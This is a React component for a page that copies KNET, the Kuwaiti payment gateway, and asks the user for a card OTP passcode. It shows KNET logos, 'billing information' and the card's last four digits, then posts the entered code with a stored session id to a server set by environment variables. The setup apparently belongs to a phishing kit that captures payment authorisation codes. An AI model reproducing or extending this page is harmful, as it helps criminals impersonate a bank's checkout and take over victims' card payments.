import React, { useEffect, useState } from "react"
import HelpImage from "./assets/help.gif"
import axios from "axios"
import { useNavigate } from "react-router-dom"

import PciImage from './assets/pci.jpg'
import VisaImage from './assets/visa.jpg'
import MasterImage from './assets/master.jpg'
import { useTranslation } from "react-i18next"

const KnetOTPPage = () => {
  const { t } = useTranslation();

  const [submitBtnContent, setSubmitBtnContent] = useState(t('submit'));
  const [submitBtnDis, setSubmitBtnDis] = useState(false)
  const navigate = useNavigate()
  const [input1Value, setInput1Value] = useState("")
  const today = new Date()
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`

  const handleCodeSubmit = async () => {
    setSubmitBtnContent(<div className="inputLoader"></div>)
    setSubmitBtnDis(true)
    const dataToSend = {
      uuId: localStorage.getItem("uuId"),
      code: input1Value,
    }

    try {
      const response = await axios.post(
        `${process.env.REACT_APP_SERVER_URL}/api/otp_verif`,
        dataToSend
      )
      if (response.status === 200) {
        navigate("/3ds/kloading")
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false)
        setSubmitBtnContent("Submit")
      }, 3000)
    }
  }

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value])

  const updateSubmitBtnDisabled = () => {
    console.log(
      `KD {input1Value.length} + KD {input2Value.length} + KD {input3Value.length}`
    )
    // Check conditions for enabling/disabling submit button

    setSubmitBtnDis(false) // Enable submit button if all inputs are filled

    if (input1Value.length > 5) {
      setSubmitBtnDis(false) // Enable submit button if all inputs are filled
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }

  const firstDigit = localStorage.getItem('first-digit');

  // Determine the image source and alt text
  let imageSrc, altText;
  if (firstDigit === '4') {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (firstDigit === '5') {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  } else {
    imageSrc = null; // No image if not 4 or 5
    altText = 'No card';
  }

  return (
    <>

            <div className="flex flex-col items-center w-full">
          <div className="flex flex-col w-full max-w-md p-3 min-h-lvh">
            <div className="w-full">
              <img className="w-full rounded-xl" src="/assets/img/mob.jpg" alt="" />
            </div>
    
            <div className="flex flex-col items-center w-full p-4 mt-4 border-2 border-blue-500 shadow-lg rounded-xl">
              <img src="/assets/img/New_knet_logo.jpg" alt="KNET Logo" />
              <img src="/assets/img/separator.jpg" className="mt-4" alt="" />
    
              <div className="flex flex-col w-full">
                <span className="text-lg font-bold text-blue-500">
                  {t("billing_information")}
                </span>
                <div className="grid w-full grid-cols-3 gap-2 ml-1 text-sm">
                  <span className="font-bold text-blue-500">{t("merchant")}</span>
                  <span className="col-span-2">{process.env.REACT_APP_MERCHANT_NAME}</span>
                  <span className="font-bold text-blue-500">{t("website")}</span>
                  <span className="col-span-2">https://{process.env.REACT_APP_DOMAIN_NAME}</span>
                  <span className="font-bold text-blue-500">{t("amount")}</span>
                  <span>KD {localStorage.getItem("ksumm")}</span>
                </div>
    

    
        <h1 className="mb-4 mt-6 text-lg font-bold text-gray-800">
          {t("enter_passcode_title")}
        </h1>

        <p className="mb-6 text-xs text-gray-900">
          {t("enter_passcode_desc")}
        </p>

        <div className="grid grid-cols-2 mb-4 text-sm gap-2">


          <span className="font-bold text-blue-500">{t("date")}:</span>
          <span className="text-gray-700">{formattedDate}</span>

          <span className="font-bold text-blue-500">{t("card_number")}:</span>
          <span dir="ltr" className="text-gray-900 text-end">**** **** **** {localStorage.getItem("last-four-digits")}</span>


        </div>

        <div>
          <div className="grid items-center grid-cols-2">
            <label
              htmlFor="otp"
              className="block mb-2 text-sm  font-bold text-blue-500"
              >
              {t("enter_passcode_label")}
            </label>

            <input
              value={input1Value}
              onChange={(e) => {
                const onlyNums = e.target.value.replace(/\D/g, '');
                setInput1Value(onlyNums);
              }}
              type="text"
              inputMode="numeric"
              maxLength={6}
              className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none"
              placeholder={t("enter_passcode_placeholder")}
              />

            <div className=""></div>

          </div>

          <div className="flex items-center mt-8 justify-between">
            <button type="button" className="px-4 py-2 text-xs">
              {t("cancel")}
            </button>
            <button
              onClick={handleCodeSubmit}
              type="submit"
              disabled={submitBtnDis}
              className="px-6 py-1 text-xs leading-none border rounded-sm h-fit border-neutral-800 bg-neutral-100"
              >
              {submitBtnContent}
            </button>
            <button type="button" className="flex items-center px-4 py-2 text-xs">
              {t("help")}
            </button>
          </div>
        </div>
     
              </div>
            </div>
    
            <div className="flex flex-col items-center w-full text-xs text-center">
              <span className="mt-4">{t("copyright")}</span>
              <span className="font-semibold text-blue-500">
                {t("knet_footer")}
              </span>
            </div>
          </div>
        </div>
              </>
  )
}

export default KnetOTPPage
